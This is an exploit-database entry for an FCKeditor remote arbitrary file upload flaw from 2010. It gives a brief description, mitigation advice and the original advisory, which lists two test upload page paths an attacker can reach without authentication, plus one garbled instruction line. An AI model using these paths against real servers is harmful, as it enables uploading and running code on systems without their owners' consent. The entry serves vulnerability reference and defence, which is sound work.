header-logo
Suggest Exploit
vendor:
fckeditor
by:
Mr.MLL
9,3
CVSS
HIGH
Remote Arbitrary File Upload
434
CWE
Product Name: fckeditor
Affected Version From: All
Affected Version To: All
Patch Exists: Yes
Related CWE: N/A
CPE: a:fckeditor:fckeditor
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

CMS (fckeditor) Remote Arbitrary File Upload Exploit

A vulnerability exists in fckeditor, which allows an attacker to upload arbitrary files to the server. The vulnerability is due to the lack of authentication when uploading files. An attacker can exploit this vulnerability by sending a malicious file to the server and then accessing it directly. This can lead to the execution of arbitrary code on the server.

Mitigation:

The vendor should implement authentication when uploading files, and should also restrict the types of files that can be uploaded.
Source

Exploit-DB raw data:

# Title: CMS (fckeditor) Remote Arbitrary File Upload Exploit


# Author: Mr.MLL
# Published: 2010-04-15
# Verified: yes
# Download Exploit Code
# Download N/A

==================================================================================================================


[o] CMS (fckeditor)

Software : fckeditor ( version all )
Vendor : http://ckeditor.com/
Contact : 7@live.com & Y-3@hotmail.com & te1@yahoo.com
Home : http://sec-r1z.com/


==================================================================================================================


[o] Exploit

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

http://localhost/[path]/FCKeditor/editor/filemanager/browser/default/test.html





[o] After the piece go to the path that will set you back after graduation


==================================================================================================================


[o] Greetz



muslims hacker & All My Friends


==================================================================================================================